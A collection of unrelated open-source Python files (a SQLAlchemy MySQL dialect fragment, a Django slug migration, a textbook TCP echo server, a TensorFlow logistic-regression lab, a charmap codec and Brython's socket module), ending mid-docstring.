        util.coerce_kw_type(opts, 'buffered', bool)
        util.coerce_kw_type(opts, 'raise_on_warnings', bool)
        opts.setdefault('buffered', True)
        opts.setdefault('raise_on_warnings', True)
        # FOUND_ROWS must be set in ClientFlag to enable
        # supports_sane_rowcount.
        if self.dbapi is not None:
            try:
                from mysql.connector.constants import ClientFlag
                client_flags = opts.get(
                    'client_flags', ClientFlag.get_default())
                client_flags |= ClientFlag.FOUND_ROWS
                opts['client_flags'] = client_flags
            except Exception:
                # ClientFlag support is best-effort; connect without
                # FOUND_ROWS rather than fail.  (Was a bare ``except:``,
                # which also swallowed SystemExit/KeyboardInterrupt.)
                pass
        return [[], opts]
    @util.memoized_property
    def _mysqlconnector_version_info(self):
        # Parse e.g. "2.0.4" into (2, 0, 4); returns None when unknown.
        if self.dbapi and hasattr(self.dbapi, '__version__'):
            m = re.match(r'(\d+)\.(\d+)(?:\.(\d+))?',
                         self.dbapi.__version__)
            if m:
                return tuple(
                    int(x)
                    for x in m.group(1, 2, 3)
                    if x is not None)
    @util.memoized_property
    def _mysqlconnector_double_percents(self):
        # Only pre-2.0 drivers on Python 2 format-interpolate statements.
        return not util.py3k and self._mysqlconnector_version_info < (2, 0)
    def _get_server_version_info(self, connection):
        dbapi_con = connection.connection
        version = dbapi_con.get_server_version()
        return tuple(version)
    def _detect_charset(self, connection):
        return connection.connection.charset
    def _extract_error_code(self, exception):
        return exception.errno
    def is_disconnect(self, e, connection, cursor):
        """Return True if *e* indicates the connection was dropped."""
        errnos = (2006, 2013, 2014, 2045, 2055, 2048)
        exceptions = (self.dbapi.OperationalError, self.dbapi.InterfaceError)
        if isinstance(e, exceptions):
            return e.errno in errnos or \
                "MySQL Connection not available." in str(e)
        else:
            return False
    def _compat_fetchall(self, rp, charset=None):
        # Driver rows need no charset post-processing.
        return rp.fetchall()
    def _compat_fetchone(self, rp, charset=None):
        return rp.fetchone()
# Entry point looked up by SQLAlchemy's dialect loader.
dialect = MySQLDialect_mysqlconnector
DylannCordel/pybbm | pybb/migrations/0003_slugs_fill.py | 7 | 1365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from pybb.models import create_or_check_slug
def fill_slugs(apps, schema_editor):
    """Forward migration: generate a unique slug for every category,
    forum and topic that predates the slug field."""
    Category = apps.get_model("pybb", "Category")
    Forum = apps.get_model("pybb", "Forum")
    Topic = apps.get_model("pybb", "Topic")
    for category in Category.objects.all():
        category.slug = create_or_check_slug(instance=category, model=Category)
        category.save()
    # Forum slugs only need to be unique within their category, and topic
    # slugs within their forum, so the parent is passed as an extra filter.
    for forum in Forum.objects.all():
        forum.slug = create_or_check_slug(instance=forum, model=Forum,
                                          category=forum.category)
        forum.save()
    for topic in Topic.objects.all():
        topic.slug = create_or_check_slug(instance=topic, model=Topic,
                                          forum=topic.forum)
        topic.save()
def clear_slugs(apps, schema_editor):
    """Reverse migration: blank out every slug so the forward pass can be
    replayed."""
    for model_name in ("Category", "Forum", "Topic"):
        model = apps.get_model("pybb", model_name)
        model.objects.all().update(slug='')
class Migration(migrations.Migration):
    # Data migration: populate slugs going forward, blank them going back.
    dependencies = [
        ('pybb', '0002_slugs_optional'),
    ]
    operations = [
        migrations.RunPython(fill_slugs, clear_slugs),
    ]
| bsd-2-clause |
ASMlover/study | reading-notes/CorePython/src/time_srv.py | 1 | 1886 | # Copyright (c) 2014 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# NOTE: Python 2 script (print statements, byte-string socket payloads).
# A simple TCP time-stamping echo server from Core Python.
from socket import *
from time import ctime
# Listen on all interfaces, port 6666; echo each request back with the
# current time prepended.
HOST = ''
PORT = 6666
BUFSIZE = 1024
ADDR = (HOST, PORT)
tcpSrvSock = socket(AF_INET, SOCK_STREAM)
tcpSrvSock.bind(ADDR)
tcpSrvSock.listen(5)
while True:
    print 'waiting for connection ...'
    tcpCltSock, addr = tcpSrvSock.accept()
    print '...connection from:', addr
    # Per-client echo loop: runs until the client closes its end.
    while True:
        data = tcpCltSock.recv(BUFSIZE)
        if not data:
            # empty read -> peer closed the connection
            break
        tcpCltSock.send('[%s] %s' % (ctime(), data))
    tcpCltSock.close()
# Unreachable in practice: the accept loop above never exits normally.
tcpSrvSock.close()
| bsd-2-clause |
hohoins/ml | hunkim/ml_lab_05.py | 1 | 1187 | # 참고자료
# 모두를 위한 머신러닝/딥러닝 강의
# 홍콩과기대 김성훈
# http://hunkim.github.io/ml
import tensorflow as tf
import numpy as np
# Data
xy = np.loadtxt('ml_lab_05.txt', unpack=True, dtype='float32')
x_data = xy[0:-1]
y_data = xy[-1]
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
# variable
W = tf.Variable(tf.random_uniform([1, 3], -1.0, 1.0))
# Hypothesis
h = tf.matmul(W, X)
hypothesis = tf.div(1.0, 1.0 + tf.exp(-h))
# Cost
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y)*tf.log(1-hypothesis))
# Gradient descent algorithm
a = tf.Variable(0.1)
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost)
# init
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
# Train
for step in range(2001):
sess.run(train, feed_dict={X: x_data, Y: y_data})
if step % 20 == 0:
print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))
# predict
print(sess.run(hypothesis, feed_dict={X: [[1], [2], [2]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1], [5], [5]]}) > 0.5)
print(sess.run(hypothesis, feed_dict={X: [[1, 1], [4, 3], [3, 5]]}) > 0.5)
| apache-2.0 |
TNT-Samuel/Coding-Projects | DNS Server/Source/Lib/encodings/iso8859_3.py | 272 | 13089 | """ Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
    # Stateless codec backed by this module's charmap tables.
    def encode(self,input,errors='strict'):
        # Returns (encoded bytes, length consumed).
        return codecs.charmap_encode(input,errors,encoding_table)
    def decode(self,input,errors='strict'):
        # Returns (decoded str, length consumed).
        return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    # Charmap encoding needs no state between calls; just drop the length.
    def encode(self, input, final=False):
        return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    # Charmap decoding needs no state between calls; just drop the length.
    def decode(self, input, final=False):
        return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
    # Stream writer: combines the charmap Codec with the generic machinery.
    pass
class StreamReader(Codec,codecs.StreamReader):
    # Stream reader: combines the charmap Codec with the generic machinery.
    pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-3',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\u0126' # 0xA1 -> LATIN CAPITAL LETTER H WITH STROKE
'\u02d8' # 0xA2 -> BREVE
'\xa3' # 0xA3 -> POUND SIGN
'\xa4' # 0xA4 -> CURRENCY SIGN
'\ufffe'
'\u0124' # 0xA6 -> LATIN CAPITAL LETTER H WITH CIRCUMFLEX
'\xa7' # 0xA7 -> SECTION SIGN
'\xa8' # 0xA8 -> DIAERESIS
'\u0130' # 0xA9 -> LATIN CAPITAL LETTER I WITH DOT ABOVE
'\u015e' # 0xAA -> LATIN CAPITAL LETTER S WITH CEDILLA
'\u011e' # 0xAB -> LATIN CAPITAL LETTER G WITH BREVE
'\u0134' # 0xAC -> LATIN CAPITAL LETTER J WITH CIRCUMFLEX
'\xad' # 0xAD -> SOFT HYPHEN
'\ufffe'
'\u017b' # 0xAF -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
'\xb0' # 0xB0 -> DEGREE SIGN
'\u0127' # 0xB1 -> LATIN SMALL LETTER H WITH STROKE
'\xb2' # 0xB2 -> SUPERSCRIPT TWO
'\xb3' # 0xB3 -> SUPERSCRIPT THREE
'\xb4' # 0xB4 -> ACUTE ACCENT
'\xb5' # 0xB5 -> MICRO SIGN
'\u0125' # 0xB6 -> LATIN SMALL LETTER H WITH CIRCUMFLEX
'\xb7' # 0xB7 -> MIDDLE DOT
'\xb8' # 0xB8 -> CEDILLA
'\u0131' # 0xB9 -> LATIN SMALL LETTER DOTLESS I
'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
'\u011f' # 0xBB -> LATIN SMALL LETTER G WITH BREVE
'\u0135' # 0xBC -> LATIN SMALL LETTER J WITH CIRCUMFLEX
'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
'\ufffe'
'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
'\xc0' # 0xC0 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\ufffe'
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\u010a' # 0xC5 -> LATIN CAPITAL LETTER C WITH DOT ABOVE
'\u0108' # 0xC6 -> LATIN CAPITAL LETTER C WITH CIRCUMFLEX
'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xc8' # 0xC8 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0xCA -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcc' # 0xCC -> LATIN CAPITAL LETTER I WITH GRAVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\ufffe'
'\xd1' # 0xD1 -> LATIN CAPITAL LETTER N WITH TILDE
'\xd2' # 0xD2 -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\u0120' # 0xD5 -> LATIN CAPITAL LETTER G WITH DOT ABOVE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd7' # 0xD7 -> MULTIPLICATION SIGN
'\u011c' # 0xD8 -> LATIN CAPITAL LETTER G WITH CIRCUMFLEX
'\xd9' # 0xD9 -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\u016c' # 0xDD -> LATIN CAPITAL LETTER U WITH BREVE
'\u015c' # 0xDE -> LATIN CAPITAL LETTER S WITH CIRCUMFLEX
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\ufffe'
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\u010b' # 0xE5 -> LATIN SMALL LETTER C WITH DOT ABOVE
'\u0109' # 0xE6 -> LATIN SMALL LETTER C WITH CIRCUMFLEX
'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\ufffe'
'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\u0121' # 0xF5 -> LATIN SMALL LETTER G WITH DOT ABOVE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf7' # 0xF7 -> DIVISION SIGN
'\u011d' # 0xF8 -> LATIN SMALL LETTER G WITH CIRCUMFLEX
'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\u016d' # 0xFD -> LATIN SMALL LETTER U WITH BREVE
'\u015d' # 0xFE -> LATIN SMALL LETTER S WITH CIRCUMFLEX
'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
# Invert the decoding table once at import time for charmap_encode.
encoding_table=codecs.charmap_build(decoding_table)
| gpl-3.0 |
coursemdetw/2014c2 | wsgi/static/Brython2.1.3-20140704-213726/Lib/socket.py | 730 | 14913 | # Wrapper module for _socket, providing some additional facilities
# implemented in Python.
"""\
This module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.
Functions:
socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
fromshare() -- create a socket object from data received from socket.share() [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout and
optional source address.
[*] not available on all platforms!
Special objects:
SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported
Integer constants:
AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)
Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
"""
import _socket
from _socket import *
import os, sys, io
try:
    import errno
except ImportError:
    errno = None
# Fall back to the conventional POSIX numbers when the errno module is
# unavailable on this platform.
EBADF = getattr(errno, 'EBADF', 9)
EAGAIN = getattr(errno, 'EAGAIN', 11)
EWOULDBLOCK = getattr(errno, 'EWOULDBLOCK', 11)
__all__ = ["getfqdn", "create_connection"]
__all__.extend(os._get_exports_list(_socket))
# Keep a reference to the raw C-level socket type before the socket class
# defined below shadows the name.
_realsocket = socket
# WSA error codes
if sys.platform.lower().startswith("win"):
    # Map Winsock error numbers to human-readable messages.
    errorTab = {}
    errorTab[10004] = "The operation was interrupted."
    errorTab[10009] = "A bad file handle was passed."
    errorTab[10013] = "Permission denied."
    errorTab[10014] = "A fault occurred on the network??" # WSAEFAULT
    errorTab[10022] = "An invalid operation was attempted."
    errorTab[10035] = "The socket operation would block"
    errorTab[10036] = "A blocking operation is already in progress."
    errorTab[10048] = "The network address is in use."
    errorTab[10054] = "The connection has been reset."
    errorTab[10058] = "The network has been shut down."
    errorTab[10060] = "The operation timed out."
    errorTab[10061] = "Connection refused."
    errorTab[10063] = "The name is too long."
    errorTab[10064] = "The host is down."
    errorTab[10065] = "The host is unreachable."
    __all__.append("errorTab")
class socket(_socket.socket):
    """A subclass of _socket.socket adding the makefile() method."""
    __slots__ = ["__weakref__", "_io_refs", "_closed"]
    def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, fileno=None):
        _socket.socket.__init__(self, family, type, proto, fileno)
        # Number of live file-like objects handed out by makefile(); the
        # underlying fd is only truly closed once this drops to zero.
        self._io_refs = 0
        self._closed = False
    def __enter__(self):
        return self
    def __exit__(self, *args):
        if not self._closed:
            self.close()
    def __repr__(self):
        """Wrap __repr__() to reveal the real class name."""
        s = _socket.socket.__repr__(self)
        if s.startswith("<socket object"):
            s = "<%s.%s%s%s" % (self.__class__.__module__,
                                self.__class__.__name__,
                                getattr(self, '_closed', False) and " [closed] " or "",
                                s[7:])
        return s
    def __getstate__(self):
        # Sockets wrap OS-level state and cannot be pickled.
        raise TypeError("Cannot serialize socket object")
    def dup(self):
        """dup() -> socket object

        Return a new socket object connected to the same system resource.
        """
        fd = dup(self.fileno())
        sock = self.__class__(self.family, self.type, self.proto, fileno=fd)
        sock.settimeout(self.gettimeout())
        return sock
    def accept(self):
        """accept() -> (socket object, address info)

        Wait for an incoming connection.  Return a new socket
        representing the connection, and the address of the client.
        For IP sockets, the address info is a pair (hostaddr, port).
        """
        fd, addr = self._accept()
        sock = socket(self.family, self.type, self.proto, fileno=fd)
        # Issue #7995: if no default timeout is set and the listening
        # socket had a (non-zero) timeout, force the new socket in blocking
        # mode to override platform-specific socket flags inheritance.
        if getdefaulttimeout() is None and self.gettimeout():
            sock.setblocking(True)
        return sock, addr
    def makefile(self, mode="r", buffering=None, *,
                 encoding=None, errors=None, newline=None):
        """makefile(...) -> an I/O stream connected to the socket

        The arguments are as for io.open() after the filename,
        except the only mode characters supported are 'r', 'w' and 'b'.
        The semantics are similar too.  (XXX refactor to share code?)
        """
        for c in mode:
            if c not in {"r", "w", "b"}:
                # BUGFIX: the original never interpolated the offending
                # mode into the message (missing '% mode').
                raise ValueError("invalid mode %r (only r, w, b allowed)"
                                 % (mode,))
        writing = "w" in mode
        reading = "r" in mode or not writing
        assert reading or writing
        binary = "b" in mode
        rawmode = ""
        if reading:
            rawmode += "r"
        if writing:
            rawmode += "w"
        raw = SocketIO(self, rawmode)
        self._io_refs += 1
        if buffering is None:
            buffering = -1
        if buffering < 0:
            buffering = io.DEFAULT_BUFFER_SIZE
        if buffering == 0:
            if not binary:
                raise ValueError("unbuffered streams must be binary")
            return raw
        if reading and writing:
            buffer = io.BufferedRWPair(raw, raw, buffering)
        elif reading:
            buffer = io.BufferedReader(raw, buffering)
        else:
            assert writing
            buffer = io.BufferedWriter(raw, buffering)
        if binary:
            return buffer
        text = io.TextIOWrapper(buffer, encoding, errors, newline)
        text.mode = mode
        return text
    def _decref_socketios(self):
        # Called by SocketIO.close(): release one makefile() reference and
        # finish closing the socket if close() was already requested.
        if self._io_refs > 0:
            self._io_refs -= 1
        if self._closed:
            self.close()
    def _real_close(self, _ss=_socket.socket):
        # This function should not reference any globals. See issue #808164.
        _ss.close(self)
    def close(self):
        # This function should not reference any globals. See issue #808164.
        self._closed = True
        if self._io_refs <= 0:
            self._real_close()
    def detach(self):
        """detach() -> file descriptor

        Close the socket object without closing the underlying file descriptor.
        The object cannot be used after this call, but the file descriptor
        can be reused for other purposes.  The file descriptor is returned.
        """
        self._closed = True
        return super().detach()
def fromfd(fd, family, type, proto=0):
    """ fromfd(fd, family, type[, proto]) -> socket object

    Create a socket object from a duplicate of the given file
    descriptor.  The remaining arguments are the same as for socket().
    """
    # Duplicate first so the caller's descriptor stays independently owned.
    return socket(family, type, proto, dup(fd))
if hasattr(_socket.socket, "share"):
    # Only defined where the platform supports socket sharing (Windows).
    def fromshare(info):
        """ fromshare(info) -> socket object

        Create a socket object from the bytes object returned by
        socket.share(pid).
        """
        return socket(0, 0, 0, info)
if hasattr(_socket, "socketpair"):
    def socketpair(family=None, type=SOCK_STREAM, proto=0):
        """socketpair([family[, type[, proto]]]) -> (socket object, socket object)

        Create a pair of socket objects from the sockets returned by the platform
        socketpair() function.
        The arguments are the same as for socket() except the default family is
        AF_UNIX if defined on the platform; otherwise, the default is AF_INET.
        """
        if family is None:
            try:
                family = AF_UNIX
            except NameError:
                # AF_UNIX is undefined on some platforms (e.g. Windows).
                family = AF_INET
        a, b = _socket.socketpair(family, type, proto)
        # Re-wrap the raw _socket.socket pair in this module's socket class.
        a = socket(family, type, proto, a.detach())
        b = socket(family, type, proto, b.detach())
        return a, b
_blocking_errnos = { EAGAIN, EWOULDBLOCK }
class SocketIO(io.RawIOBase):

    """Raw I/O implementation for stream sockets.

    This class supports the makefile() method on sockets.  It provides
